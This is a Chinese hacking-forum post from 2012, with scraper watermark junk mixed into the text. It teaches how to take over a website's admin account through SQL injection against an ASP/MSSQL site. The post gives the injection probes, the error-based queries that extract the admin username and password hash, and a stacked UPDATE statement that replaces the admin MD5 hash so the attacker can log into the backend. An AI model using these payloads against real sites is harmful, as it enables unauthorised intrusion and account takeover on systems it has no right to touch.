经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。3 m7 M. h p: T, _
可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)6 u; z6 Z; v) O
测试如下:
3 ~! X5 l7 F$ uhttp://www.tmdsb.com/news.asp?id=121
% L9 t9 ^; t1 i# c; [0 T在地址后输入单引号,显示# u a( ~8 a9 \- C, K$ q
Microsoft OLE DB Provider for SQL Server 错误 ’80040e14’
$ Q3 |! J5 v2 o' I字符串 ’’’ 之前有未闭合的引号
) O# x4 g9 M u C$ B* r1 R" n; b/news/tmdws.asp,行63
( M$ n( D/ w3 n/ j$ o! _说明没有过滤单引号且数据库是MSSQL.
3 f) q& B- r, ^4 n3 N& Rand 1=1正常。and 1=2出错。肯定存在注入
$ b8 c3 Z( ?- b! h! A+ v6 }接着输入
7 c# N: s: \/ Q. e8 k- B; Q- w Uhttp://www.tmdsb.com/news.asp?id=1 or admin_user in (select id from admin)
4 g3 D& L4 u( ~9 z4 }得到帐号为:admin
. U. N U Y( |& S. b7 N+ ~http://www.tmdsb.com/news.asp?id=121 or admin_password in (select id from admin)
9 y# d8 z% h( {4 g2 T得到密码为:a4716077c2ba075c
1 _) E9 L% w2 y4 q4 e8 W接下来我们就可以改密码了。但我们先前要知道我们加密的字符:e8dc763194f29433
& g; Y3 i* P7 h6 F( {* k1 s命令如下 :+ p$ \( ~ ~& r7 M: g7 N% O8 `
;update shop_admin set password=’e8dc763194f29433’ where password=’a4716077c2ba075c’–0 R6 W* [+ u/ f; ^8 a8 a
这句的意思就是用e8dc763194f29433替换a4716077c2ba075c,以达到修改密码的目的 |
发表于 2012-9-13 17:55:24
收藏
支持
反对
发表于 2012-9-14 16:22:41